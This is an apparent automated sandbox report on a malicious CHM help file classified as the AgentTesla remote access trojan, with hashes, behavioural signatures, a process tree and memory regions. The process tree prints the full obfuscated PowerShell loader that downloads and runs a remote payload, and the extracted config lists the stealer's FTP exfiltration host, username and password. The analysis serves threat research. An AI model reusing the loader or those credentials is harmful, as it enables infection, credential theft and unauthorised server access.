Analysis
-
max time kernel
175s -
max time network
181s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
08-12-2022 11:15
Static task
static1
Behavioral task
behavioral1
Sample
mel9.chm
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
mel9.chm
Resource
win10v2004-20221111-en
General
-
Target
mel9.chm
-
Size
13KB
-
MD5
e7a3bc55f52eebb6ce7df0a0047fec40
-
SHA1
b152e0d6abc8dab4500aaa4161dac968e54cad20
-
SHA256
908d78eb614a8ecf652163a4ccbdf62deec33d03747d4342d4f90e5bcf7995d8
-
SHA512
3537fee98df7a02510e65c4a7fbe302e154d37e5ea497fe2677936f3442afc565a4a6307a870971ca3f45a8d25bee50b71a04c515664737cbe72d4031a186a81
-
SSDEEP
192:8FYhJztroZ7rRXcAU9aoSpW9KZYtsufMCKv6:gYjtroZ7rAv9yYtsuFKv
Malware Config
Extracted
https://cricot2.kylos.pl/mel9.txt
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.peva.it - Port:
21 - Username:
anita@peva.it - Password:
Team2318!@#
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 75 2460 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exepid process 2460 powershell.exe 2460 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2460 set thread context of 3036 2460 powershell.exe RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeRegAsm.exepid process 2460 powershell.exe 2460 powershell.exe 3036 RegAsm.exe 3036 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
powershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 2460 powershell.exe Token: SeIncreaseQuotaPrivilege 2460 powershell.exe Token: SeSecurityPrivilege 2460 powershell.exe Token: SeTakeOwnershipPrivilege 2460 powershell.exe Token: SeLoadDriverPrivilege 2460 powershell.exe Token: SeSystemProfilePrivilege 2460 powershell.exe Token: SeSystemtimePrivilege 2460 powershell.exe Token: SeProfSingleProcessPrivilege 2460 powershell.exe Token: SeIncBasePriorityPrivilege 2460 powershell.exe Token: SeCreatePagefilePrivilege 2460 powershell.exe Token: SeBackupPrivilege 2460 powershell.exe Token: SeRestorePrivilege 2460 powershell.exe Token: SeShutdownPrivilege 2460 powershell.exe Token: SeDebugPrivilege 2460 powershell.exe Token: SeSystemEnvironmentPrivilege 2460 powershell.exe Token: SeRemoteShutdownPrivilege 2460 powershell.exe Token: SeUndockPrivilege 2460 powershell.exe Token: SeManageVolumePrivilege 2460 powershell.exe Token: 33 2460 powershell.exe Token: 34 2460 powershell.exe Token: 35 2460 powershell.exe Token: 36 2460 powershell.exe Token: SeIncreaseQuotaPrivilege 2460 powershell.exe Token: SeSecurityPrivilege 2460 powershell.exe Token: SeTakeOwnershipPrivilege 2460 powershell.exe Token: SeLoadDriverPrivilege 2460 powershell.exe Token: SeSystemProfilePrivilege 2460 powershell.exe Token: SeSystemtimePrivilege 2460 powershell.exe Token: SeProfSingleProcessPrivilege 2460 powershell.exe Token: SeIncBasePriorityPrivilege 2460 powershell.exe Token: SeCreatePagefilePrivilege 2460 powershell.exe Token: SeBackupPrivilege 2460 powershell.exe Token: SeRestorePrivilege 2460 powershell.exe Token: SeShutdownPrivilege 2460 powershell.exe Token: SeDebugPrivilege 2460 powershell.exe Token: SeSystemEnvironmentPrivilege 2460 powershell.exe Token: SeRemoteShutdownPrivilege 2460 powershell.exe Token: SeUndockPrivilege 2460 powershell.exe Token: SeManageVolumePrivilege 2460 powershell.exe Token: 33 2460 powershell.exe Token: 34 2460 powershell.exe Token: 35 2460 powershell.exe Token: 36 2460 powershell.exe Token: SeDebugPrivilege 3036 RegAsm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 1212 hh.exe 1212 hh.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
hh.exepowershell.exedescription pid process target process PID 1212 wrote to memory of 2460 1212 hh.exe powershell.exe PID 1212 wrote to memory of 2460 1212 hh.exe powershell.exe PID 2460 wrote to memory of 3036 2460 powershell.exe RegAsm.exe PID 2460 wrote to memory of 3036 2460 powershell.exe RegAsm.exe PID 2460 wrote to memory of 3036 2460 powershell.exe RegAsm.exe PID 2460 wrote to memory of 3036 2460 powershell.exe RegAsm.exe PID 2460 wrote to memory of 3036 2460 powershell.exe RegAsm.exe PID 2460 wrote to memory of 3036 2460 powershell.exe RegAsm.exe PID 2460 wrote to memory of 3036 2460 powershell.exe RegAsm.exe PID 2460 wrote to memory of 3036 2460 powershell.exe RegAsm.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\mel9.chm1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://cricot2.kylos.pl/mel9.txt')|P2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\6fa7e56d-5a67-4728-a5db-c67fd5cf7763\AgileDotNetRT64.dllFilesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
C:\Users\Admin\AppData\Local\Temp\f1c816ee-9c5b-4ee5-8939-4ab00a42e9d3\AgileDotNetRT64.dllFilesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
memory/2460-135-0x00007FFBD2B50000-0x00007FFBD3611000-memory.dmpFilesize
10.8MB
-
memory/2460-134-0x000002329FA60000-0x000002329FA82000-memory.dmpFilesize
136KB
-
memory/2460-137-0x00007FFBD2B50000-0x00007FFBD3611000-memory.dmpFilesize
10.8MB
-
memory/2460-138-0x00007FFBC9A20000-0x00007FFBC9B6E000-memory.dmpFilesize
1.3MB
-
memory/2460-133-0x0000000000000000-mapping.dmp
-
memory/2460-143-0x00007FFBD2B50000-0x00007FFBD3611000-memory.dmpFilesize
10.8MB
-
memory/3036-140-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/3036-141-0x0000000000437A7E-mapping.dmp
-
memory/3036-142-0x0000000005460000-0x0000000005A04000-memory.dmpFilesize
5.6MB
-
memory/3036-144-0x00000000051E0000-0x000000000527C000-memory.dmpFilesize
624KB
-
memory/3036-145-0x00000000053F0000-0x0000000005456000-memory.dmpFilesize
408KB